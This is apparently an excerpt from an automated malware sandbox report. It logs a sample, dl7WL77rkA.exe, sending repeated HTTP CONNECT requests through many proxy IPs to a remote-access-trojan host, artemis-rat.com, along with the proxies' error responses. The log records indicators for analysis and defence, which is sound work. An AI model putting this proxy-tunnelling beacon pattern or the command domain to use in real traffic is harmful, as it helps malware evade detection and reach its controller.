Mar 11, 2024 03:30:59.202193022 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1916192.168.2.555250195.201.19.844433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:46.935340881 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1917192.168.2.55368751.79.87.144412303876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:46.942265034 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1918192.168.2.55414972.49.49.11310343876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:46.960963011 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.905071020 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1919192.168.2.55518293.126.56.3041533876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:46.964027882 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1920192.168.2.551707185.208.102.5580803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:46.966078997 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.092526913 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.202147007 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:59.202186108 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1921192.168.2.555187221.231.13.19810803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:46.966080904 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1922192.168.2.555185222.223.103.23273023876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:46.966608047 CET  193  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Mar 11, 2024 03:30:47.310465097 CET  90  IN  HTTP/1.1 200 OK
Content-Type: application/json
Connection: close
Content-Length: 55


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1923192.168.2.55521338.162.25.231283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:46.979317904 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.435564995 CET  111  IN  HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm=""
Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
Data Ascii: Proxy Authentication Required


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1924192.168.2.551014117.160.250.16399993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:46.980967045 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.014518976 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.971826077 CET  221  IN  HTTP/1.1 403 Access Denied
Date: Mon, 11 Mar 2024 02:30:50 GMT
Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.970778942 CET221INHTTP/1.1 403 Access Denied
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:50 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1925192.168.2.55521723.19.244.10910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.981578112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1926192.168.2.55521544.190.9.65481003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.982561111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1927192.168.2.555214162.223.89.84803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.986198902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.623802900 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:51 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1928192.168.2.55478939.109.113.9731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.007514000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.014547110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.014746904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.735773087 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.16.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:09:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.944502115 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.16.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:09:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1929192.168.2.55370792.205.110.118183743876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.008243084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.014549971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.014745951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.108282089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1930192.168.2.555193138.2.73.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.008485079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1931192.168.2.55520443.155.171.35156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.009929895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1932192.168.2.55486651.89.173.40301993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.012301922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.701998949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.702094078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.592749119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.389576912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.202092886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.092590094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1933192.168.2.555190109.194.22.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.038523912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1934192.168.2.554916109.86.182.20331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.041832924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.092705011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.202147007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.202289104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1935192.168.2.555218154.12.178.107299853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.155867100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1936192.168.2.555186196.251.131.3880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.156111956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1937192.168.2.55520841.111.198.108803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.156984091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.476449966 CET708INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 532
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1938192.168.2.555219196.20.125.14580833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.157499075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1939192.168.2.555226104.19.217.219803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.164174080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.324462891 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1940192.168.2.555231104.25.58.39803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.164505005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.325170040 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
